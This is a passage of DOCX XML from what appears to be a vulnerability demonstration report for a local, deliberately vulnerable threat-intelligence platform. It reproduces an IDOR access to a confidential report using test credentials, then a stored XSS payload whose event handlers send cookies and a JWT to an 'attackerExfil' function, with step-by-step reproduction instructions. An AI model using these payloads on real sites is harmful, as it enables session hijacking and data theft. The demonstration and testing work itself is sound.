        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t># 1. Login as unauthorized Consumer</w:t>
              <w:br/>
              <w:t>$login = Invoke-RestMethod -Uri "http://localhost:3000/api/auth/login" -Method Post -ContentType "application/json" -Body '{"username":"consumer_siem","password":"Password123!"}'</w:t>
              <w:br/>
              <w:t>$mfa = Invoke-RestMethod -Uri "http://localhost:3000/api/auth/verify-mfa" -Method Post -ContentType "application/json" -Body (@{tempToken=$login.tempToken; totpCode="123456"} | ConvertTo-Json)</w:t>
              <w:br/>
              <w:br/>
              <w:t># 2. Query the confidential TLP:RED report ID directly</w:t>
              <w:br/>
              <w:t>$res = Invoke-RestMethod -Uri "http://localhost:3000/api/reports/rep-b2549c8d-ef95-44bd-9490-616d8eae6834" -Headers @{Authorization="Bearer $($mfa.accessToken)"}</w:t>
              <w:br/>
              <w:t>$res.report | Format-List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4 Expected HTTP Request &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The raw HTTP exchange demonstrating the vulnerability is captured below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET /api/reports/rep-b2549c8d-ef95-44bd-9490-616d8eae6834 HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: localhost:3000</w:t>
              <w:br/>
              <w:t>Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...</w:t>
              <w:br/>
              <w:t>Accept: application/json</w:t>
              <w:br/>
              <w:br/>
              <w:t>HTTP/1.1 200 OK</w:t>
              <w:br/>
              <w:t>Content-Type: application/json; charset=utf-8</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "report": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "id": "rep-b2549c8d-ef95-44bd-9490-616d8eae6834",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "org_id": "org-cyber-defense",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "author_id": "usr-contrib-01",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "title": "CONFIDENTIAL: Project Titan Kernel Zero-Day Incursion",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "summary": "Proprietary zero-day vulnerability exploit observed against core internal systems",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "content_markdown": "### Restricted Intelligence\nExploit chain targets kernel driver 0xDEADBEEF. Internal victim network IP range: 10.240.0.0/16.",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "tlp_level": "RED",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "status": "PENDING",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "created_at": "2026-10-08 12:11:27",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "author_org": "Cyber Defense Corp",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "author_user": "contributor_alex",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "linkedIndicators": []</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.5 Technical Analysis &amp; Threat Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Point: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where Authorization Fails: In src/controllers/reportController.js inside getReportById() (lines 116–135). The handler queries threat_reports by requested URL parameter 'id' without checking 'req.user.orgId === report.org_id' or evaluating 'canAccessTLP(req.user, report.tlp_level)'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed Information: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposed Confidential Data: Full proprietary zero-day vulnerability description, victim internal IP topology ('10.240.0.0/16'), kernel driver exploit offsets ('0xDEADBEEF'), and submitting organization attribution ('Cyber Defense Corp').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why This is IDOR/BOLA: The endpoint directly exposes a database object key in the URL and performs retrieval based solely on record existence rather than user object-level authorization or security clearance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE Classification: CWE-639 (Authorization Bypass Through User-Controlled Key).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> STRIDE Threat Model: T04 (Information Disclosure: Unauthorized Egress of TLP:RED Intelligence) and T08 (Information Disclosure on Feeds).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Tree: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Tree Mapping: Root Goal -&gt; Branch B -&gt; Leaf B1 (Broken Object-Level Authorization / IDOR) on Asset A05 (Threat Incident Reports).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Take Screenshots: (1) Capture DevTools Console or terminal output showing HTTP 200 OK returning 'tlp_level: RED' to consumer_siem. (2) Capture reportController.js lines 116–130 showing missing tenant check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 2 — V04 STORED XSS VULNERABILITY DEMONSTRATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This section provides the exact procedure to reproduce Vulnerability 2 (V04 / CWE-79: Stored Cross-Site Scripting via Naive Regex Blacklist Bypass) using the approved controlled vulnerability test payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1 Pre-Requisites &amp; Test Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The demonstration uses the exact controlled payload defined in tests/vulnerability/vulnerabilityDemo.test.js:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>### Urgent Security Advisory</w:t>
              <w:br/>
              <w:t>Investigation of compromised host 10.0.1.5.</w:t>
              <w:br/>
              <w:t>&lt;!-- HTML Event Handler injection bypassing &lt;script&gt; blacklist --&gt;</w:t>
              <w:br/>
              <w:t>&lt;img src="https://images.unsplash.com/photo-1550751827-4bd374c3f58b" width="100" onmouseover="window.attackerExfil(document.cookie)"&gt;</w:t>
              <w:br/>
              <w:t>&lt;details open ontoggle="window.attackerExfil(localStorage.getItem('jwtToken'))"&gt;&lt;summary&gt;Malicious Drop&lt;/summary&gt;Active trigger&lt;/details&gt;</w:t>
              <w:br/>
              <w:t>&lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;Click for evidence&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2 Step-by-Step UI Execution Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 (Sign In): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open browser at 'http://localhost:3000' and sign in as 'contributor_alex' (Password: 'Password123!', TOTP: '123456').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 (Navigate to Ingest): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click navigation tab '2. IoC &amp; Report Ingestion'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 (Fill Form): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the right-hand panel ('Structured Threat Report (Stored XSS Sanitized)'), enter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   Incident Title: 'APT41 Exploit Dossier (Malicious Payload)'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   Executive Summary: 'Detailed forensic analysis containing embedded event-handler vectors'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   Report TLP: 'TLP:AMBER'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   Detailed Incident Markdown: Paste the exact controlled test payload above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 (Submit Report): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click 'Submit Sanitized Threat Report'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 (Observe Server Acceptance): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Observe the green confirmation alert: 'Threat Report Persisted! ID: rep-... Notice: Naive regex only removed &lt;script&gt; tags; HTML5 event handlers remain stored in DB (V04).'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3 Retrieving &amp; Verifying Stored Malicious Content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DevTools Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open DevTools Console (F12) in the dashboard and query the report by ID:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fetch('/api/reports/&lt;REPORT_ID&gt;', { headers: { Authorization: 'Bearer ' + localStorage.getItem('cti_jwt') } }).then(r =&gt; r.json()).then(d =&gt; console.log(d.report.content_markdown))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alternatively, inspect the raw SQLite database directly in Terminal 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlite3 data/cti_platform.sqlite "SELECT id, title, content_markdown FROM threat_reports WHERE title LIKE '%APT41 Exploit Dossier%' LIMIT 1;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Observed Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notice that 'onmouseover="window.attackerExfil(document.cookie)"' and '&lt;details open ontoggle="window.attackerExfil(...)"' are stored completely unescaped and returned verbatim by the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.4 Technical Analysis &amp; Blacklist Flaw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
